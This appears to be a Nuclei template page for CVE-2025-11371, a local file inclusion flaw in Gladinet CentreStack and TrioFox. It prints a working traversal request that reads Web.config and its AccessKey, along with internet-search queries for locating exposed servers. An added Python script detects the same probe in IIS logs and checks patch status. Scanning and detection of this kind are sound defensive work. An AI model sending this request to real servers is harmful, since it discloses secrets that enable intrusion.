Gladinet CentreStack & TrioFox - Local File Inclusion
CVE-2025-11371
Verified
Description
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue affects all versions of Gladinet CentreStack and TrioFox prior to and including 16.7.10368.56560.
Severity
Medium
CVSS Score
6.2
Exploit Probability
29%
Published Date
October 16, 2025
Template Author
kazgangap
CVE-2025-11371.yaml
id: CVE-2025-11371

info:
  name: Gladinet CentreStack & TrioFox - Local File Inclusion
  author: Kazgangap
  severity: medium
  description: |
    In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue affects all versions of Gladinet CentreStack and TrioFox prior to and including 16.7.10368.56560.
  impact: |
    Unauthenticated attackers can disclose sensitive system files, potentially leading to information leakage.
  remediation: |
    Update to a version later than 16.7.10368.56560 or the latest available version.
  reference:
    - https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md
    - https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11371
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.2
    cve-id: CVE-2025-11371
    cwe-id: CWE-552
    epss-score: 0.29324
    epss-percentile: 0.96371
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"CentreStack"
    fofa-query: "CentreStack - Login"
  tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev

http:
  - raw:
      - |
        GET /storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<configuration>", "<system.web>", "AccessKey")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220025bc1a8b27d49aac8bd75e3cb82f4ee89cddfc559c52fc82b1476aa5bae31ec022100ababadc6cb96b17664db027b80dda99a72bb36ba8a85f629ee8b36a125138c1d:922c64590222798bb761d5b6d8e72950
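The template above checks a live host; a defender reviewing web-server logs for the same probe wants the reverse view. The following Python is an added example, not part of the Nuclei template or of Gladinet's software. It parses a few constructed IIS W3C-style log lines (the field order is an assumption), flags requests to `/storage/t.dn` whose `s` parameter decodes to a `../` or `..\` traversal sequence (including a double-encoded variant), and compares a build string against the last affected version named on this page so a patch status can be scripted.

```python
"""
Added detection and triage example for CVE-2025-11371 (not the Nuclei
template's code and not Gladinet's). Log field order and sample lines are
constructed assumptions for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Last affected build stated in the advisory.
LAST_AFFECTED_VERSION = "16.7.10368.56560"

# Endpoint probed by the template; IIS paths are case-insensitive, so compare lowercased.
PROBE_PATH = "/storage/t.dn"

# '../' or '..\' after full URL decoding, in any mix of separators.
_TRAVERSAL = re.compile(r"\.\.[\\/]")

# Assumed W3C field order (a common IIS default subset). IIS replaces spaces
# in field values with '+', so whitespace splitting is safe.
W3C_FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
              "port", "username", "c_ip", "user_agent", "status"]

# Constructed sample log: one benign portal hit, the advisory's own probe,
# a legitimate download, and a double-encoded probe that returned 404.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-10-16 08:01:02 10.0.0.5 GET /portal/loginpage.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
2025-10-16 08:01:09 10.0.0.5 GET /storage/t.dn s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 443 - 198.51.100.7 curl/8.0 200
2025-10-16 08:02:30 10.0.0.5 GET /storage/t.dn s=report.pdf&sid=42 443 alice 192.0.2.10 Mozilla/5.0 200
2025-10-16 08:03:11 10.0.0.5 GET /storage/t.dn s=..%252F..%252Fweb.config&sid=1 443 - 203.0.113.9 python-requests/2.31 404
"""


def _version_tuple(version: str) -> tuple:
    return tuple(int(part) for part in version.split("."))


def is_affected_version(version: str) -> bool:
    """True when the build is at or below 16.7.10368.56560, i.e. still unpatched."""
    return _version_tuple(version) <= _version_tuple(LAST_AFFECTED_VERSION)


def is_lfi_probe(method: str, request_uri: str) -> bool:
    """Flag a GET to /storage/t.dn whose 's' value contains a traversal sequence."""
    parts = urlsplit(request_uri)
    if method.upper() != "GET" or parts.path.lower() != PROBE_PATH:
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("s", []):
        # parse_qs decoded once already; decode again to catch %252F / %255C.
        if _TRAVERSAL.search(unquote(value)):
            return True
    return False


def parse_w3c_line(line: str):
    """Split one W3C log line into a dict, or return None for comments/short lines."""
    if line.startswith("#") or not line.strip():
        return None
    fields = line.split()
    if len(fields) != len(W3C_FIELDS):
        return None
    return dict(zip(W3C_FIELDS, fields))


def find_probes(log_lines) -> list:
    """Return one record per log line that looks like a CVE-2025-11371 probe.

    A 404 or other non-200 status is still reported: a failed probe is
    evidence of scanning even when no file was disclosed.
    """
    hits = []
    for line in log_lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        query = "" if rec["uri_query"] == "-" else rec["uri_query"]
        uri = rec["uri_stem"] + (f"?{query}" if query else "")
        if is_lfi_probe(rec["method"], uri):
            hits.append({"time": f'{rec["date"]} {rec["time"]}', "src": rec["c_ip"],
                         "status": rec["status"], "uri": uri})
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG.splitlines()):
        print(f'{hit["time"]} {hit["src"]} status={hit["status"]} {hit["uri"]}')
    print("16.7.10368.56560 affected:", is_affected_version("16.7.10368.56560"))
    print("16.7.10368.56561 affected:", is_affected_version("16.7.10368.56561"))
```

The matcher deliberately keys on the decoded traversal sequence rather than on the exact `Web.config` path from the template, since the same endpoint can be pointed at any readable file; pairing a hit with a 200 response and an `application/octet-stream` body, as the template's matchers do, is what separates a successful disclosure from a blocked attempt.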
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2025-11371
CWE ID:
CWE-552
Remediation Steps
Update to a version later than 16.7.10368.56560 or the latest available version.